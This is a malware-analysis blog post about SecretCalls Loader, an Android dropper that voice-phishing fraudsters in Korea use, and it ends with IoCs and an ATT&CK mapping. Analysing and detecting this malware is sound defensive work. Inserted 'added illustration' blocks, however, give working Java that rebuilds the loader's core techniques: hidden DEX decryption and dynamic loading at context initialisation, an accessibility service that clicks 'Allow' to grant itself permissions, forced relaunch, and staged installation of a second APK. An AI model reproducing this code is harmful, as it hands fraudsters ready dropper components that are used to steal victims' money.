SecretCalls Spotlight: A Formidable App of Notorious Korean Financial Fraudster (Part 1)

Published in S2W BLOG, 8 min read, Apr 30, 2024


Author: S2W TALON

Last modified: Apr 30, 2024


You can also read more about this voice phishing group in our Black Hat Asia 2024 briefing: https://www.blackhat.com/asia-24/briefings/schedule/index.html#voice-phishing-syndicates-unmasked-an-in-depth-investigation-and-exposure-37941

Executive Summary

  • Voice phishing groups build phishing pages and malicious Android apps, trick victims into visiting the pages and installing the apps, and then use the apps to commit financial fraud and steal the victims' money.
  • We named a family of voice phishing apps distributed in South Korea that impersonate law enforcement agencies, financial institutions, and others SecretCalls Loader / SecretCalls. The threat group that uses this malware in voice phishing attacks is tracked as SecretCrow.
  • SecretCalls Loader disrupts analysis with emulator detection, class/method name obfuscation, DEX encryption, dynamic DEX loading, and a second-stage installation (SecretCalls).
  • SecretCalls will be analyzed in two parts: "Part 1" covers the phishing site, the distribution method, and the SecretCalls Loader app; "Part 2" covers the functionality of SecretCalls itself, including the actual malicious behavior.

Introduction

Losses caused by voice phishing in Korea have totaled 1.8 trillion KRW over the last five years, and the cumulative total was expected to reach 4 trillion KRW by 2022. According to the National Police Agency, the average voice phishing victim over the past five years has been in their 50s. The share of victims in their 20s was relatively small in 2018, but it grew steadily and by 2022 was the largest of any age group.

Figure 1. Age of Voice Phishing Victims over the Last 5 Years
(Source: National Police Agency)

Voice phishing groups operating in South Korea use a variety of tactics to deceive large numbers of victims. They follow a systematic procedure: operating phishing sites, distributing malicious apps, and collecting victims' personal information, which they then use to persuade victims to install the apps or transfer money. According to the Financial Supervisory Service, the groups call victims directly, lead them to a phishing site, and instruct them to install the app.

Figure 2. Excerpt of a voicemail call from a victim.
(Source: Financial Supervisory Service YouTube)

Once the victim downloads and installs the malicious app from the phishing site, the attacker can remotely control the device. In August of last year, a remote control app distributed through smishing that impersonated a delivery service stole the ID card stored on the victim's device; a new OTP was then issued with it, resulting in financial fraud worth about 400 million KRW.

In addition, the app can force a call to the attacker or force the device to answer a call from the attacker. This "call-forwarding" feature can cancel an outgoing call and redirect it to another member of the voice phishing group even when the victim dials a legitimate financial institution or law enforcement agency. Because the call screen is manipulated, the phone still displays the legitimate number the victim entered while the call is actually connected to the attacker. As a result, a victim infected with a voice phishing app may believe they are speaking with a legitimate employee of the institution and fall victim to financial fraud.

The attack cycle of voice phishing groups is shown below.

  1. The attacker selects a victim and calls them to get them to install an app
  2. The victim visits the phishing site provided by the attacker and installs the malicious app
  3. After installing the app, the victim calls a legitimate institution to verify the claim that they are involved in financial fraud
  4. The app cancels the call and forwards it to the attacker, which can result in financial fraud.
Figure 3. Example voice phishing attack tactic

Phishing Site

SecretCalls is one type of malicious app used by voice phishing groups. It is distributed through phishing sites posing as law enforcement agencies or financial institutions. The phishing sites borrow the themes of legitimate apps registered on the Google Play Store, such as "National Police Agency Cybercop" and "Phishing Eyes". Clicking the "Install" button on the site downloads the malicious APK file, whose name follows the pattern [A-Za-z0-9]{5}.apk.

Figure 4. Example of SecretCalls phishing page

SecretCalls has historically been distributed by impersonating law enforcement agencies such as the "National Police Agency" and the "General Prosecutor's Office," as well as financial companies, and has been disguised under various themes such as anti-voice-phishing apps, video players, shopping malls, and more.

Figure 5. Themes used when disseminating SecretCalls

Detailed Analysis of SecretCalls Loader

The SecretCalls Loader downloaded from the phishing site acts as a dropper and loader that installs SecretCalls. The loader's second-stage code is stored inside the APK in encrypted form under the resource path, using the obfuscated DEX file name "secret-classes.dex". In April 2023 the internal file name was changed to "kill-classes.dex" and samples with that name began circulating, but apart from the file name, the distribution method and key features are the same as before.

Sample information

  • Filename: byfg2.apk
  • App name: Sacn Check
  • Package name: com.onaBDx.iGFKde
  • MD5: 2603b73c22498e6eb20c4cfae5d34850
  • SHA-1: 121b6fd9178edfd3b6422c66c3d504bee90cbe46
  • SHA-256: 76bb1d3fa9b8b872c01da30bfac5fe52ae89d3ca43ce0dad967bc7da0a8e7644
  • Cert(SHA-1): e24292b5d840671519b87cb076f9ced4f39191c5

1. Load Native Library

SecretCalls Loader uses a native library for both emulator detection and DEX file decryption, which keeps the decryption key and routine out of the Java code.

Figure 6. Loading the Native Library

2. Decrypt kill-classes.dex

The SecretCalls Loader abuses the context initialization step to decrypt and dynamically load a DEX file. Among the app's internal files, besides "classes.dex", there is a "kill-classes.dex" file. This DEX file is AES-encrypted and is decrypted and dynamically loaded as the app runs.

Figure 7. SecretCalls Loader File Structure

The decrypt() function implemented in the native library decrypts the encrypted "kill-classes.dex" file carried in the APK. The key is hardcoded in the library, and the file is decrypted with AES-128 in ECB mode, so there is no IV and every 16-byte block is decrypted independently.

  • Decryption key: "dbcdcfghijklmaop" (16 ASCII bytes, i.e. the raw AES-128 key)
Figure 8. DEX Decryption
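The following is an added example written for this page, not S2W's code and not the loader's own code: a stand-alone decryptor that takes a kill-classes.dex pulled out of the APK, applies the parameters above (AES-128, ECB, key "dbcdcfghijklmaop"), and validates the result through the DEX header rather than trusting that the key was right. It assumes the file is raw AES ciphertext with no header or IV in front of it; the padding scheme is not stated on the page, so the code decrypts with NoPadding and trims to the file_size field every DEX header carries, which works whether the encryptor padded or not.

```java
// Added example (not S2W's code, not the loader's code): decrypt kill-classes.dex
// and validate the plaintext via the DEX header. Assumes raw AES-128/ECB
// ciphertext with no header or IV; padding is unknown, so we decrypt with
// NoPadding and trim to the file_size field at offset 0x20.
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.zip.Adler32;

public class KillClassesDecrypt {
    // 16 ASCII bytes = the AES-128 key recovered from the native library (from the page).
    static final byte[] KEY = "dbcdcfghijklmaop".getBytes(StandardCharsets.US_ASCII);
    static final int DEX_HEADER_LEN = 0x70;    // fixed header size in every DEX version
    static final int DEX_CHECKSUM_OFF = 0x08;  // adler32 over everything after this field
    static final int DEX_FILE_SIZE_OFF = 0x20; // total length of the (unpadded) file

    static byte[] decryptRaw(byte[] ct) throws Exception {
        if (ct.length % 16 != 0)
            throw new IllegalArgumentException("ciphertext length " + ct.length + " is not a multiple of 16");
        Cipher c = Cipher.getInstance("AES/ECB/NoPadding"); // ECB: no IV, blocks are independent
        c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(KEY, "AES"));
        return c.doFinal(ct);
    }

    // Decrypt and return exactly file_size bytes, failing loudly if key/mode/offset is wrong.
    static byte[] decryptDex(byte[] ct) throws Exception {
        byte[] pt = decryptRaw(ct);
        if (pt.length < DEX_HEADER_LEN || pt[0] != 'd' || pt[1] != 'e' || pt[2] != 'x' || pt[3] != '\n')
            throw new IllegalStateException("no DEX magic after decryption: wrong key, mode or offset");
        ByteBuffer hdr = ByteBuffer.wrap(pt).order(ByteOrder.LITTLE_ENDIAN);
        int fileSize = hdr.getInt(DEX_FILE_SIZE_OFF);
        if (fileSize < DEX_HEADER_LEN || fileSize > pt.length)
            throw new IllegalStateException("implausible file_size " + fileSize);
        byte[] dex = Arrays.copyOf(pt, fileSize); // drops padding, whatever scheme produced it
        Adler32 a = new Adler32();
        a.update(dex, 12, dex.length - 12);
        long stored = hdr.getInt(DEX_CHECKSUM_OFF) & 0xFFFFFFFFL;
        if (a.getValue() != stored)
            throw new IllegalStateException("adler32 mismatch: computed " + Long.toHexString(a.getValue())
                    + ", header says " + Long.toHexString(stored));
        return dex;
    }

    // Offline self-check on a constructed 0x70-byte header (not a real sample), encrypted
    // with PKCS#5 padding to show that the file_size trim copes with padded input.
    static boolean selfTest() throws Exception {
        byte[] hdr = new byte[DEX_HEADER_LEN];
        System.arraycopy("dex\n035\0".getBytes(StandardCharsets.US_ASCII), 0, hdr, 0, 8);
        ByteBuffer b = ByteBuffer.wrap(hdr).order(ByteOrder.LITTLE_ENDIAN);
        b.putInt(DEX_FILE_SIZE_OFF, DEX_HEADER_LEN);
        b.putInt(0x24, DEX_HEADER_LEN); // header_size field
        Adler32 a = new Adler32();
        a.update(hdr, 12, hdr.length - 12);
        b.putInt(DEX_CHECKSUM_OFF, (int) a.getValue());
        Cipher enc = Cipher.getInstance("AES/ECB/PKCS5Padding");
        enc.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"));
        return Arrays.equals(decryptDex(enc.doFinal(hdr)), hdr);
    }

    public static void main(String[] args) throws Exception {
        if (args.length == 0) {
            System.out.println("self-test " + (selfTest() ? "passed" : "FAILED"));
            return;
        }
        if (args.length != 2) {
            System.err.println("usage: KillClassesDecrypt [<kill-classes.dex> <out.dex>]");
            System.exit(2);
        }
        byte[] dex = decryptDex(Files.readAllBytes(Path.of(args[0])));
        Files.write(Path.of(args[1]), dex);
        System.out.println("wrote " + dex.length + " bytes, DEX version "
                + new String(dex, 4, 3, StandardCharsets.US_ASCII));
    }
}
```

Run `java KillClassesDecrypt.java` (JDK 11+ single-file launcher) for the self-test, or `java KillClassesDecrypt.java kill-classes.dex out.dex` after extracting the file from the APK with unzip; the output opens directly in jadx or baksmali. A failing magic check on a real sample means the variant uses a different key, a different mode, or some bytes in front of the ciphertext, and the native decrypt() routine is the place to look for all three.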

3. Dex dynamic loading

Android apps perform context initialization before the main activity is launched. If an Application subclass is specified in the android:name attribute of the <application> element in AndroidManifest.xml, its attachBaseContext() override (a method inherited from ContextWrapper) is invoked during that initialization. The APK can therefore load any resources or data it needs at this point, before the main behavior runs.

Figure 9. Context Initialization — attachBaseContext()

The native library call and the DEX decryption described above all take place during context initialization. Once both have completed, the decrypted DEX file is loaded dynamically and its classes are reached through Java reflection.

Figure 10. Part of the DEX dynamic loading process — JAVA Reflection
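An added illustration of the mechanism in sections 1 to 3, written for this page and not taken from the loader: an Application subclass, wired in through `<application android:name=".StageOneApp" ...>`, whose attachBaseContext() loads the native library, decrypts the embedded DEX, and hands it to a DexClassLoader before any Activity exists. The library name, the entry class name, and the method it invokes are hypothetical; in the real sample they are obfuscated.

```java
// Added illustration (not the loader's own code) of context-initialization loading.
// Library name "stage", class "com.example.stage2.Entry" and method "init" are assumed.
import android.app.Application;
import android.content.Context;
import dalvik.system.DexClassLoader;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.zip.ZipFile;

public class StageOneApp extends Application {
    static { System.loadLibrary("stage"); }            // 1. native library (name assumed)
    private static native byte[] decrypt(byte[] enc);   // 2. AES-128/ECB; key lives in the .so

    @Override
    protected void attachBaseContext(Context base) {
        super.attachBaseContext(base);                  // runs before any Activity is created
        try {
            // kill-classes.dex sits next to classes.dex at the APK root, so read our own APK.
            byte[] enc;
            try (ZipFile apk = new ZipFile(base.getApplicationInfo().sourceDir);
                 InputStream in = apk.getInputStream(apk.getEntry("kill-classes.dex"))) {
                ByteArrayOutputStream buf = new ByteArrayOutputStream();
                byte[] chunk = new byte[8192];
                for (int n; (n = in.read(chunk)) > 0; ) buf.write(chunk, 0, n);
                enc = buf.toByteArray();
            }
            File dex = new File(base.getCodeCacheDir(), "kill-classes.dex");
            try (FileOutputStream out = new FileOutputStream(dex)) { out.write(decrypt(enc)); }

            // 3. dynamic loading: parent = our own loader, so stage two can see android.*
            //    and the loader's classes; the entry point is reached by reflection.
            ClassLoader cl = new DexClassLoader(dex.getAbsolutePath(),
                    base.getCodeCacheDir().getAbsolutePath(), null, getClassLoader());
            Class<?> entry = cl.loadClass("com.example.stage2.Entry"); // hypothetical name
            Method init = entry.getMethod("init", Context.class);      // hypothetical name
            init.invoke(null, base);
        } catch (Exception e) {
            throw new RuntimeException("stage two failed", e);
        }
    }
}
```

For triage, the tell-tales are exactly the pieces this sketch needs: an android:name value pointing at a class that overrides attachBaseContext, a System.loadLibrary call in a static initializer, and a DexClassLoader (or InMemoryDexClassLoader) constructed before the first Activity. Hooking the DexClassLoader constructor at runtime is the quickest way to capture the decrypted file without reversing the native routine at all.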

4–1. Emulator detection

When the main activity runs the decrypted DEX, it first checks whether the device meets the conditions for infection. If any of the following conditions is not met, execution is aborted.

Table 1. Emulator detection conditions

4–2. Delete the phishing detection app

SecretCalls Loader deletes phishing-detection apps if they are installed on the infected device. Four apps are targeted, including "Whowho". When deletion completes, a Toast message reading "Malicious app has been deleted" is displayed. Of the targeted apps, DU Caller is no longer available for download on the Play Store.

Table 2. List of target apps

4–3. Force acceptance of permissions

The malicious app tricks the user into granting it accessibility access. At launch it checks whether its accessibility service is enabled; if not, it shows a dialog reading "To use this app, you must allow [Accessibility - Installed Services - Sacn Check] to use normal services" and then exits.
Once the user enables accessibility for the voice phishing app in Settings, the broadcast receiver relaunches the app, which then uses the accessibility service to grant itself permissions without the user's consent: in each permission-related activity it looks up and clicks the button labeled "허용" (Allow) or "항상 허용" (Always allow). In this sample the requested permissions include "Read/Write External Storage" and "Install Unknown Apps".

Figure 11. Find the Allow Permissions button
Figure 12. Click the button
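An added illustration of the auto-grant technique above, written for this page rather than taken from the sample: an AccessibilityService that reacts to window changes and clicks a button whose label is exactly "허용" or "항상 허용". The service class name and the `armed` flag are hypothetical; the service must be declared in the manifest with BIND_ACCESSIBILITY_SERVICE and an accessibility XML config that subscribes to window state/content change events, which is the part the user is tricked into enabling.

```java
// Added illustration (not the loader's own code) of clicking "Allow" by accessibility.
// Class name and the "armed" gate are assumed; the sample's own names are obfuscated.
import android.accessibilityservice.AccessibilityService;
import android.content.Context;
import android.provider.Settings;
import android.text.TextUtils;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import java.util.List;

public class AutoAllowService extends AccessibilityService {
    private static final String[] ALLOW_LABELS = { "항상 허용", "허용" }; // most specific first

    // Set by the requesting Activity right before requestPermissions() or before opening
    // the "install unknown apps" settings page, cleared after one click, so the service
    // only acts on dialogs the app itself provoked.
    static volatile boolean armed = false;

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        if (!armed) return;
        AccessibilityNodeInfo root = getRootInActiveWindow();
        if (root == null) return;
        for (String label : ALLOW_LABELS) {
            List<AccessibilityNodeInfo> hits = root.findAccessibilityNodeInfosByText(label);
            for (AccessibilityNodeInfo node : hits) {
                // findAccessibilityNodeInfosByText is a substring match, so "허용" would
                // also hit "허용 안함" (Don't allow); compare the whole label before clicking.
                if (node.isClickable() && TextUtils.equals(node.getText(), label)) {
                    node.performAction(AccessibilityNodeInfo.ACTION_CLICK);
                    armed = false;
                    return;
                }
            }
        }
    }

    @Override
    public void onInterrupt() {}

    // The launch-time gate from the text: is this service among the enabled ones?
    static boolean isEnabled(Context ctx, Class<? extends AccessibilityService> svc) {
        String enabled = Settings.Secure.getString(ctx.getContentResolver(),
                Settings.Secure.ENABLED_ACCESSIBILITY_SERVICES);
        String me = ctx.getPackageName() + "/" + svc.getName();
        return enabled != null && enabled.contains(me);
    }
}
```

In decompiled code the combination of findAccessibilityNodeInfosByText with Korean "Allow" strings and performAction(ACTION_CLICK) is the signature to grep for; the same pair also drives the app-deletion step in 4-2, since the uninstall confirmation is just another dialog with a button to press.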

4–4. Files related to the infection status

During this process, malicious actions such as launching apps, installing additional apps, and deleting apps, together with their results, are recorded as files on the infected device. When a particular malicious function is called, its status is written to the file corresponding to that function.

Table 3. Files for recording infection status

4–5. Force Relaunch the App

The broadcast receiver registered by BaseActivity reruns BaseActivity whenever a system dialog is dismissed (the app leaves the screen) for any reason other than the home button being pressed. This presumably keeps the malicious app running even if it is closed abnormally.

4–6. Install and run SecretCalls

The SecretCalls APK, which performs the actual remote control, is stored in the app's assets path. In this sample it is named "cFuvDW.apk"; the embedded file name follows the pattern [A-Za-z]{6}.apk, and the file is not further obfuscated or encrypted. SecretCalls Loader copies it out as "SecurityService.apk" and installs it through the system Install App activity. After installation succeeds, the broadcast receiver launches SecretCalls and deletes the copied file.

  • receiver: Lcom/onaBDx/iGFKde/base/BaseActivity;->mPkgReceiver
Figure 13. SecretCalls installation process
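An added illustration, written for this page and not taken from the sample, of the two receiver-driven behaviours in 4-5 and 4-6: relaunching the activity when a system dialog is dismissed for any reason except the home key, and launching SecretCalls once its package has been installed, after staging it from assets as "SecurityService.apk". The page does not name the broadcasts involved; ACTION_CLOSE_SYSTEM_DIALOGS with its "reason" extra and ACTION_PACKAGE_ADDED are the standard Android signals for these two events and are assumed here, as are the FileProvider authority (which needs a matching <provider> entry) and the second-stage package name.

```java
// Added illustration (not the loader's own code) of BaseActivity's receiver logic.
// Assumed: ACTION_CLOSE_SYSTEM_DIALOGS/"reason" for 4-5, ACTION_PACKAGE_ADDED for 4-6,
// FileProvider authority "<pkg>.files", and stage-two package "com.example.stage2".
import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.Uri;
import android.os.Bundle;
import androidx.core.content.FileProvider;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;

public class BaseActivity extends Activity {
    static final String ASSET_NAME = "cFuvDW.apk";         // [A-Za-z]{6}.apk inside assets/
    static final String COPY_NAME = "SecurityService.apk";  // name of the on-disk staging copy
    static final String STAGE2_PKG = "com.example.stage2";  // hypothetical package name

    private final BroadcastReceiver mPkgReceiver = new BroadcastReceiver() {
        @Override public void onReceive(Context ctx, Intent i) {
            String action = i.getAction();
            if (Intent.ACTION_CLOSE_SYSTEM_DIALOGS.equals(action)) {
                // 4-5: "homekey" is the one reason tolerated; anything else relaunches the activity.
                if (!"homekey".equals(i.getStringExtra("reason")))
                    startActivity(new Intent(ctx, BaseActivity.class).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
            } else if (Intent.ACTION_PACKAGE_ADDED.equals(action) && i.getData() != null
                    && STAGE2_PKG.equals(i.getData().getSchemeSpecificPart())) {
                // 4-6: start the freshly installed app and remove the staging copy.
                Intent launch = getPackageManager().getLaunchIntentForPackage(STAGE2_PKG);
                if (launch != null) startActivity(launch);
                new File(getFilesDir(), COPY_NAME).delete();
            }
        }
    };

    @Override protected void onCreate(Bundle saved) {
        super.onCreate(saved);
        registerReceiver(mPkgReceiver, new IntentFilter(Intent.ACTION_CLOSE_SYSTEM_DIALOGS));
        IntentFilter pkg = new IntentFilter(Intent.ACTION_PACKAGE_ADDED);
        pkg.addDataScheme("package"); // without the scheme, PACKAGE_ADDED is never delivered
        registerReceiver(mPkgReceiver, pkg);
        installStageTwo();
    }

    @Override protected void onDestroy() { unregisterReceiver(mPkgReceiver); super.onDestroy(); }

    // 4-6: copy assets/cFuvDW.apk to files/SecurityService.apk and hand it to the installer
    // activity. Needs REQUEST_INSTALL_PACKAGES plus the "install unknown apps" toggle that
    // 4-3 auto-grants; on API 24+ the file has to be exposed through a FileProvider.
    void installStageTwo() {
        try {
            File out = new File(getFilesDir(), COPY_NAME);
            try (InputStream in = getAssets().open(ASSET_NAME);
                 FileOutputStream os = new FileOutputStream(out)) {
                byte[] buf = new byte[8192];
                for (int n; (n = in.read(buf)) > 0; ) os.write(buf, 0, n);
            }
            Uri uri = FileProvider.getUriForFile(this, getPackageName() + ".files", out); // authority assumed
            startActivity(new Intent(Intent.ACTION_INSTALL_PACKAGE)
                    .setDataAndType(uri, "application/vnd.android.package-archive")
                    .addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION));
        } catch (Exception e) {
            throw new RuntimeException("stage two install failed", e);
        }
    }
}
```

Two details matter when hunting for this pattern: the PACKAGE_ADDED filter must carry the "package" data scheme or it silently never fires, so a receiver registered that way is a strong hint that the app expects to install something; and an APK copied out of assets into the app's private directory and then deleted leaves a window in which forensic tooling can still recover it from the files/ directory of a live device.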

Conclusion

  • Voice phishing groups trick users into installing remote control apps for financial fraud; the apps are usually distributed through phishing sites.
  • The remote control app is characterized by a "call-forwarding" feature that invalidates calls to legitimate institutional phone numbers and forces calls to the attacker instead.
  • The SecretCalls Loader leverages the Android architecture for its anti-analysis techniques: dynamic DEX loading, installation of an additional app, context initialization, and native libraries.
  • Phishing sites are designed to look very similar to legitimate sites. Because it is hard to recognize a phishing site by eye, verify that the site's address is legitimate before downloading an app from it.
  • Be wary of apps obtained through SMS, websites, messengers, and other channels that are not authorized app markets (Google Play Store, Samsung One Store, etc.).

Appendix A. IoCs

Hashes

  • 9ffc137696947fa52c2a1171ed971d3d
  • c9bd36ec8f1fd4323a3585891c504999
  • 4eece3206d12f32e2061f954bb4eee33
  • ea9bd37b1cf23d95c33356e5dabfb623
  • 2ac75296c3c537faf125543c9d386b05
  • 84695f568bc58df62e9befdcf70c9fe7
  • 963272edf22f2273b5b6b309279d29dd
  • bac5c46f4070ebf7b9ce740e4e0ba1a7
  • f05c85ebbc27ccee496d7940922fc313
  • 2c567713992e320ef4545f6bad48cba1
  • 64d7cdafa0112813b3ee2f18ba0e8b05
  • e8f543d317e9b30c59e4ef9a73577936
  • 59ffa49047dd058c980c0023c4dd7087
  • 16f1bc026c56bf0ec9f89224113ec4f8
  • 984b47a9adbd9879f881af49798f11db
  • 30f608c02e39887399effb74f98ed9bc
  • 5465a99e3652c60df680eaa783263e56
  • 6b67ec8b07939cf58c81ee88cc0ba3ee
  • e40267bb203c87e33692723631183e86
  • b7081e46af122391481235a4d0a542150db1f4500cfce90e07e227730981476f
  • 1d7702548185a610711e25e0f31bdf10719ee38543ec192a129268aafc683b0b
  • 145f72fb0938f395c8d8dc71efa768241a00b7b1721bde4cc231e4233374a836
  • 54ee8358723132b4b6f41eee4c40c3a06a794201ce998d4c7cc6185a37ee0dad
  • f2c48f0a34746fae9dd0bea3eaafc11058338b39736d6a1db715da42437dd601
  • 662b84e31e38334394c35a0862dad21ef10086bd8a90619bc73c4b8598213526
  • e9b7980cde15f62dcceb98470b476b075659ef08b5a38c794b6e8954ccdcefbd
  • 0d619094cd4d2c5fe7ffa917b4cef5852101128a31b25850bb4bdcfeb782b7c0
  • 649176de7d03d218952f72ff780f6f8532752066688192f4ae92e409efaf0864
  • 9b40ee23aa24a37cffe3dba91e4e490e4138ee3f593a135d17f6b2c2e02d69e6
  • 9e8c3d489ad519cc4185d9a69085bc85048f5481743fcc7480d3dde616639771
  • 32e668ab3cbcebaec73d7b8a5b1e5cfee1c8b07969f851df6fe0f1ba405d1a89
  • ce5082cb80719da6e91d4e5fb0b4c35fd4881fb4acbdc06243a00c86b42a4ded
  • d65b2092ee471eb25c756fa4d1847b16895e57aa690c3f317df51afd79d28dd2
  • b46f93c5b127ddbea341c45c42934e32248467f6d226cf8f89c20916491e4977
  • 7f1e4420025c544b9dd8b13929b04c82ac0abd08dba8c2f1e7a667345bf06dee
  • a4c6a52cabfddb57bdaad2532f324116f7900269339d9f41c6d3c46e3bd682ae
  • baad6e7a9a06768682f5553c2b765ac5f74e708be69856d4f640a534a06da459
  • eddf03eb7a3579026eec268e74209f68286bf07993c04ec24ffab10173b69877

Network

  • 61.227.55[.]47
  • 114.44.218[.]84
  • 36.234.40[.]6

Appendix B. Mobile MITRE ATT&CK

Execution

  • (T1575) Native API

Defense Evasion

  • (T1633.001) System Checks
  • (T1630.002) File Deletion
  • (T1407) Download New Code at Runtime
  • (T1629.003) Disable or Modify Tools

S2W specializes in cybersecurity data analysis for cyber threat intelligence.